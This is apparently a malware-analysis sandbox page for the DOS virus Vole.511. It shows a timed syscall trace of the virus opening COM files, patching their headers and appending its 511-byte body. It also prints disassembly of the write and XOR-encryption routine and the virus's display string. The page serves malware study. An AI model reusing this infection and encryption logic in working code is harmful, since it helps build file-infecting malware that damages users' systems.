Sample viewer

vx.netlux.org/Virus.DOS.Vole.511

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:26:00.181244697Z 26 PC: 12aa4 | Set disk transfer address
2018-12-17T22:26:00.183555274Z 37 PC: 12ab2 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:26:00.184947472Z 37 PC: 12ab6 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:26:00.18640765Z 78 PC: 12b02 | Find first file
2018-12-17T22:26:00.192783804Z 61 PC: 12bd3 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:26:00.199776794Z 63 PC: 12be2 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:26:00.206366422Z 66 PC: 12bf1 | Move file pointer
2018-12-17T22:26:00.207970529Z 66 PC: 12c00 | Move file pointer
2018-12-17T22:26:00.209846747Z 64 PC: 12c0c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:26:00.211636933Z 66 PC: 12c18 | Move file pointer
2018-12-17T22:26:00.212702368Z 44 PC: 12c1c | Get time 0x12c1c: mov byte ptr [bp + 0x1ff], dl
0x12c20: call 0x12c36
0x12c23: mov ah, 0x40
0x12c25: mov cx, 0x1ff
0x12c28: lea dx, word ptr [bp + 6]
0x12c2c: int 0x21
0x12c2e: call 0x12c36
0x12c31: mov ah, 0x3e
0x12c33: int 0x21
0x12c35: ret
0x12c36: lea si, word ptr [bp + 0x33]
0x12c3a: mov cx, 0x1ad
0x12c3d: xor byte ptr [si], 0
0x12c40: inc si
0x12c41: dec cx
0x12c42: jne 0x12c3d
0x12c44: ret
0x12c45: add word ptr [bx], di
0x12c47: aas
0x12c48: aas
2018-12-17T22:26:00.21478936Z 64 PC: 12c2e | Write file or device (Write 511 bytes on handle 5)
2018-12-17T22:26:00.227146869Z 62 PC: 12c35 | Close file
2018-12-17T22:26:00.232203963Z 79 PC: 12b02 | Find next file
2018-12-17T22:26:00.234756341Z 61 PC: 12bd3 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:26:00.238824603Z 63 PC: 12be2 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:26:00.246092474Z 66 PC: 12bf1 | Move file pointer
2018-12-17T22:26:00.261511656Z 66 PC: 12c00 | Move file pointer
2018-12-17T22:26:00.263030492Z 64 PC: 12c0c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:26:00.265963742Z 66 PC: 12c18 | Move file pointer
2018-12-17T22:26:00.26865218Z 44 PC: 12c1c | Get time 0x12c1c: mov byte ptr [bp + 0x1ff], dl
0x12c20: call 0x12c36
0x12c23: mov ah, 0x40
0x12c25: mov cx, 0x1ff
0x12c28: lea dx, word ptr [bp + 6]
0x12c2c: int 0x21
0x12c2e: call 0x12c36
0x12c31: mov ah, 0x3e
0x12c33: int 0x21
0x12c35: ret
0x12c36: lea si, word ptr [bp + 0x33]
0x12c3a: mov cx, 0x1ad
0x12c3d: xor byte ptr [si], 0x3e
0x12c40: inc si
0x12c41: dec cx
0x12c42: jne 0x12c3d
0x12c44: ret
0x12c45: add word ptr [bx], di
0x12c47: aas
0x12c48: aas
2018-12-17T22:26:00.271248209Z 64 PC: 12c2e | Write file or device (Write 511 bytes on handle 5)
2018-12-17T22:26:00.279664265Z 62 PC: 12c35 | Close file
2018-12-17T22:26:00.288158887Z 26 PC: 12b1c | Set disk transfer address
2018-12-17T22:26:00.290205866Z 9 PC: 12b28 | Display string (Could not find end pointer)
2018-12-17T22:26:00.301474809Z 9 PC: 12b3d | Display string (String= ' Inherit the Wind !!! ')